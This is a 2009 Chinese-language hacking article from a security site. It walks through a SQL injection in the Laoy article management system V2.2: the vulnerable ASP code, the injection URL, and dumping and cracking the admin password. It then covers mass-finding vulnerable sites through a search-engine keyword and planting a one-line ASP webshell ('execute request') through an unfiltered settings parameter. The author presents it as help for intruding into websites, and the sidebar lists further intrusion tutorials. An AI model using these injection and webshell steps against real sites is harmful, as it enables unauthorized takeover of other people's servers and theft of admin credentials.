首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
网络攻防实战:老Y文章管理系统V2.2注入漏洞分析与利用
来源:安天365团队 作者:OVEGN 发布时间:2009-02-23  
网络攻防实战:老Y文章管理系统V2.2注入漏洞分析与利用
安天365团队
    同学说让我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网络,在别人的基础上进行修改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间便宜嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以至少也得检查下安全性,总不能三天两头让人修改数据。
(一)前期分析
   由于该套系统是ASP+ACCESS,可能对于我们来说就有很多的限制,不像MSSQL,MYSQL有那么多的扩展和内置函数使用,其实像这些asp,php,jsp的动态网站注入,很大一方面是需要对各种数据库的了解,你了解的越深入侵的方法就越多,说偏了,还是来看看我们的站,首先进入官方网站看看:www.laoy8.cn,随便点个http://www.laoy8.cn/Class.asp?ID=4,并在后面加了个逗号,提示说参数不合法,被过滤了,本想注册个用户再看看,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步分析。
(二)漏洞分析
   由于代码不是很多,我们就来依次分析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里其实完全可以只搜索含有关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
          set rs=server.createobject("adodb.recordset")
          sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
      rs.open sql,conn,1,1
    省略N多
   相信大家都能明白吧,id变量只是单纯的过滤了单引号就带入进了数据库,很明显产生了注入,简单分析下代码的意思,然后来构造自己的 注入语句 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放到注入工具就可以得到管理员用户名和密码,当然也可以用我给大家提供的工具,直接爆出管理员信息,然后把密码拿到www.cmd5.com去破解,接下来的事就简单。
(三)网络实战
   1.  通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶紧去网络战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
1.JPG
图1 通过关键字搜索老Y文章管理系统V2.2
2.前期准备工作
由于前面的很多网站已被挂马,大家还是尽量选稍微靠后的网站进行测试,我用自己的空间http://www.ibk528.com/来尝试,直接用工具爆出用户名和密码登陆后台,可是发现数据库备份被删了,这可怎么办,突然想到由于配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话木马,说着查看了下Admin_Setting.asp,发现除了ad1,ad2,ad3没有过滤,其他的参数由于过滤了双引号,那么我们就利用ad1参数来进行本地提交一句户木马到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
3.JPG
图2 创造“有利条件”
3.获取Webshell
将提交地址改为http://www.ibk528.com/admin/Admin_Setting.asp?Action=Edit,将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击提交,提示修改成功,然后用客户端连接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
2.JPG
(四)总结体会
   本文没有什么高深的技术,在这里只是想提醒大家在没有数据库备份的情况下,我们可以利用配置信息来插入一句话木马,希望对大家平时入侵网站时有点帮助,上面提到的网站已在第一时间补上,大家不用再去测试了,如果大家发现了其他的漏洞,也请大侠你手下留情,别在我网站上挂马,在此谢谢了。我的网名OVEGN,欢迎大家到安天365论坛(antian365.com)与我交流。
 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·网络攻防实战:由渗透扫描到实施
·一篇论文引发的入侵——记对当地
·社会工程学——骗子,是你耍我还
·一次完整的安全渗透测试
·Hacked PHPBB(dot)COM (入侵PHP
·艰难入侵“中国被黑站点统计系统
·修改封包拿WebShell
·利用python特性进行提权
·利用XSS渗透DISCUZ 6.1.0实战
·php168 v2008后台拿shell方法
·使用BackTrack3破解WEP实战
·入侵某官Game
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved